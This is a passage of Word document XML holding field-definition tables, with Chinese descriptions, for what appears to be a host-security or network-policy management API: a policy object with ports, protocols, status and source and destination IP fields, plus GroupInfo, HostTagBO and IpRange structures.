          <w:p w14:paraId="0C34D638" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="620AC901" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52CE2113" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43DA2F6B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="178BE608" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>protos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D04810B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D76F6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="460FB74A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2459E3A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="277F57F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B5E271F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略状态,0：新建，1：待同步，2：已同步,3:删除</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F62B4DD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63F7625B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24851A0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="214501CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1ADF7F21" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38C1869C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>optUsername</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7355E01E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4083C9BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="205DCA7B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B1CC732" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A127119" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6089C52A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="739EDC79" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="492D8B94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayDstIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73507DC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71F5893D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>目标IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04974541" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="307CFCC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displaySrcIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45FA2AA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2942D94E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>源IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05F107C4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A487FC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A5A620A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="486FD952" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="25A201AE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC3B00A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10452E34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="490A27B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="24A54CD7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53272928" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2062BF2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="074CB415" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否有操作权限，true：有权限，false：无权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7481AB52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GroupInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1279"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="3336"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="58B8A76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D96531D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AFF4FC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA49A1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19225D97" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EFAA043" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FE30AA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="341B5F43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="79425E05" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566D31EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="362193FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4137158B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作系统，1：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>，2：windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62D47D04" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="021DCE92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C8A681E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74C91FC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32C0F07A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CCCE1FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B067117" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="312D5274" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FE0BACB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED644F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D20D753" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FF18750" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父节点id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B6AB019" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HostTagBO</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1103"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="47F04EB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6F28B53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21D79345" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663986AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="680BDA61" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6907F72D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71A2647E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DF62C3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="39DAB32F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29C59A53" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tagName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CBE28E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="463351EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="046FDCAB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1618F3DC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tagColor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="564FF3F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="544F6203" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签颜色</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52713BDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IpRange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4B95B92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D11E8B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1319C279" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E465773" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35F8F9C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49ED2054" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28FE0677" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="344AD5CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开始</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
